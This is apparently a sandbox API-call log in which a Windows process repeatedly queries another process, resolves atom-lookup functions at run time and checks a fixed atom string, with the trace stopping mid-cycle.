	[0121.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.300] CloseHandle (hObject=0x698) returned 1
	[0121.300] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.300] CloseHandle (hObject=0x698) returned 1
	[0121.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.301] CloseHandle (hObject=0x698) returned 1
	[0121.301] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.301] CloseHandle (hObject=0x698) returned 1
	[0121.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.334] CloseHandle (hObject=0x698) returned 1
	[0121.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.334] CloseHandle (hObject=0x698) returned 1
	[0121.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.334] CloseHandle (hObject=0x698) returned 1
	[0121.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.335] CloseHandle (hObject=0x698) returned 1
	[0121.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.335] CloseHandle (hObject=0x698) returned 1
	[0121.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.335] CloseHandle (hObject=0x698) returned 1
	[0121.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.335] CloseHandle (hObject=0x698) returned 1
	[0121.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.335] CloseHandle (hObject=0x698) returned 1
	[0121.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.336] CloseHandle (hObject=0x698) returned 1
	[0121.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.336] CloseHandle (hObject=0x698) returned 1
	[0121.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.336] CloseHandle (hObject=0x698) returned 1
	[0121.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.336] CloseHandle (hObject=0x698) returned 1
	[0121.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.337] CloseHandle (hObject=0x698) returned 1
	[0121.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.337] CloseHandle (hObject=0x698) returned 1
	[0121.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.337] CloseHandle (hObject=0x698) returned 1
	[0121.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.337] CloseHandle (hObject=0x698) returned 1
	[0121.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.338] CloseHandle (hObject=0x698) returned 1
	[0121.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.338] CloseHandle (hObject=0x698) returned 1
	[0121.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.338] CloseHandle (hObject=0x698) returned 1
	[0121.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.338] CloseHandle (hObject=0x698) returned 1
	[0121.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.338] CloseHandle (hObject=0x698) returned 1
	[0121.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.339] CloseHandle (hObject=0x698) returned 1
	[0121.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.339] CloseHandle (hObject=0x698) returned 1
	[0121.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.339] CloseHandle (hObject=0x698) returned 1
	[0121.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.340] CloseHandle (hObject=0x698) returned 1
	[0121.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.340] CloseHandle (hObject=0x698) returned 1
	[0121.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.340] CloseHandle (hObject=0x698) returned 1
	[0121.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.340] CloseHandle (hObject=0x698) returned 1
	[0121.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.340] CloseHandle (hObject=0x698) returned 1
	[0121.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.341] CloseHandle (hObject=0x698) returned 1
	[0121.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.341] CloseHandle (hObject=0x698) returned 1
	[0121.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.342] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.342] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.342] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.343] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.343] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.343] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.343] CloseHandle (hObject=0x698) returned 1
	[0121.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.343] CloseHandle (hObject=0x698) returned 1
	[0121.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.343] CloseHandle (hObject=0x698) returned 1
	[0121.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.344] CloseHandle (hObject=0x698) returned 1
	[0121.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.344] CloseHandle (hObject=0x698) returned 1
	[0121.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.378] CloseHandle (hObject=0x698) returned 1
	[0121.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.378] CloseHandle (hObject=0x698) returned 1
	[0121.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.379] CloseHandle (hObject=0x698) returned 1
	[0121.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.379] CloseHandle (hObject=0x698) returned 1
	[0121.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.379] CloseHandle (hObject=0x698) returned 1
	[0121.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.380] CloseHandle (hObject=0x698) returned 1
	[0121.380] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.380] CloseHandle (hObject=0x698) returned 1
	[0121.380] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.380] CloseHandle (hObject=0x698) returned 1
	[0121.380] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.380] CloseHandle (hObject=0x698) returned 1
	[0121.380] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.380] CloseHandle (hObject=0x698) returned 1
	[0121.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.381] CloseHandle (hObject=0x698) returned 1
	[0121.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.381] CloseHandle (hObject=0x698) returned 1
	[0121.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.381] CloseHandle (hObject=0x698) returned 1
	[0121.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.381] CloseHandle (hObject=0x698) returned 1
	[0121.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.381] CloseHandle (hObject=0x698) returned 1
	[0121.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.382] CloseHandle (hObject=0x698) returned 1
	[0121.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.382] CloseHandle (hObject=0x698) returned 1
	[0121.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.382] CloseHandle (hObject=0x698) returned 1
	[0121.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.382] CloseHandle (hObject=0x698) returned 1
	[0121.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.383] CloseHandle (hObject=0x698) returned 1
	[0121.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.383] CloseHandle (hObject=0x698) returned 1
	[0121.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.383] CloseHandle (hObject=0x698) returned 1
	[0121.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.383] CloseHandle (hObject=0x698) returned 1
	[0121.383] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.383] CloseHandle (hObject=0x698) returned 1
	[0121.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.384] CloseHandle (hObject=0x698) returned 1
	[0121.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.384] CloseHandle (hObject=0x698) returned 1
	[0121.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.384] CloseHandle (hObject=0x698) returned 1
	[0121.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.384] CloseHandle (hObject=0x698) returned 1
	[0121.384] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.384] CloseHandle (hObject=0x698) returned 1
	[0121.385] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.385] CloseHandle (hObject=0x698) returned 1
	[0121.385] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.385] CloseHandle (hObject=0x698) returned 1
	[0121.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.385] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.385] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.386] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.386] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.386] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.386] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.387] CloseHandle (hObject=0x698) returned 1
	[0121.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.387] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.387] CloseHandle (hObject=0x698) returned 1
	[0121.388] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.388] CloseHandle (hObject=0x698) returned 1
	[0121.388] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.388] CloseHandle (hObject=0x698) returned 1
	[0121.388] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.388] CloseHandle (hObject=0x698) returned 1
	[0121.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.422] CloseHandle (hObject=0x698) returned 1
	[0121.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.422] CloseHandle (hObject=0x698) returned 1
	[0121.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.422] CloseHandle (hObject=0x698) returned 1
	[0121.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.422] CloseHandle (hObject=0x698) returned 1
	[0121.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.423] CloseHandle (hObject=0x698) returned 1
	[0121.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.423] CloseHandle (hObject=0x698) returned 1
	[0121.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.423] CloseHandle (hObject=0x698) returned 1
	[0121.423] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.423] CloseHandle (hObject=0x698) returned 1
	[0121.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.424] CloseHandle (hObject=0x698) returned 1
	[0121.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.424] CloseHandle (hObject=0x698) returned 1
	[0121.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.424] CloseHandle (hObject=0x698) returned 1
	[0121.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.424] CloseHandle (hObject=0x698) returned 1
	[0121.424] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.425] CloseHandle (hObject=0x698) returned 1
	[0121.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.425] CloseHandle (hObject=0x698) returned 1
	[0121.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.425] CloseHandle (hObject=0x698) returned 1
	[0121.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.426] CloseHandle (hObject=0x698) returned 1
	[0121.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.426] CloseHandle (hObject=0x698) returned 1
	[0121.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.426] CloseHandle (hObject=0x698) returned 1
	[0121.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.426] CloseHandle (hObject=0x698) returned 1
	[0121.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.426] CloseHandle (hObject=0x698) returned 1
	[0121.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.427] CloseHandle (hObject=0x698) returned 1
	[0121.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.427] CloseHandle (hObject=0x698) returned 1
	[0121.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.427] CloseHandle (hObject=0x698) returned 1
	[0121.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.428] CloseHandle (hObject=0x698) returned 1
	[0121.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.428] CloseHandle (hObject=0x698) returned 1
	[0121.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.428] CloseHandle (hObject=0x698) returned 1
	[0121.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.428] CloseHandle (hObject=0x698) returned 1
	[0121.428] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.429] CloseHandle (hObject=0x698) returned 1
	[0121.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.429] CloseHandle (hObject=0x698) returned 1
	[0121.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.429] CloseHandle (hObject=0x698) returned 1
	[0121.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.429] CloseHandle (hObject=0x698) returned 1
	[0121.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.430] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.430] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.430] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.431] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.431] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.431] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.431] CloseHandle (hObject=0x698) returned 1
	[0121.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.431] CloseHandle (hObject=0x698) returned 1
	[0121.431] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.431] CloseHandle (hObject=0x698) returned 1
	[0121.432] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.432] CloseHandle (hObject=0x698) returned 1
	[0121.432] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.432] CloseHandle (hObject=0x698) returned 1
	[0121.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.465] CloseHandle (hObject=0x698) returned 1
	[0121.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.465] CloseHandle (hObject=0x698) returned 1
	[0121.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.465] CloseHandle (hObject=0x698) returned 1
	[0121.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.466] CloseHandle (hObject=0x698) returned 1
	[0121.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.466] CloseHandle (hObject=0x698) returned 1
	[0121.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.466] CloseHandle (hObject=0x698) returned 1
	[0121.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.466] CloseHandle (hObject=0x698) returned 1
	[0121.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.466] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.467] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.467] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.467] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.467] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.467] CloseHandle (hObject=0x698) returned 1
	[0121.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.468] CloseHandle (hObject=0x698) returned 1
	[0121.469] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.469] CloseHandle (hObject=0x698) returned 1
	[0121.469] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.469] CloseHandle (hObject=0x698) returned 1
	[0121.470] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.470] CloseHandle (hObject=0x698) returned 1
	[0121.470] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.470] CloseHandle (hObject=0x698) returned 1
	[0121.470] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.470] CloseHandle (hObject=0x698) returned 1
	[0121.470] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.470] CloseHandle (hObject=0x698) returned 1
	[0121.470] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.470] CloseHandle (hObject=0x698) returned 1
	[0121.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.471] CloseHandle (hObject=0x698) returned 1
	[0121.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.471] CloseHandle (hObject=0x698) returned 1
	[0121.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.471] CloseHandle (hObject=0x698) returned 1
	[0121.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.471] CloseHandle (hObject=0x698) returned 1
	[0121.472] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.472] CloseHandle (hObject=0x698) returned 1
	[0121.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.472] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.472] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.473] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.473] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.473] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.473] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.474] CloseHandle (hObject=0x698) returned 1
	[0121.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.474] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
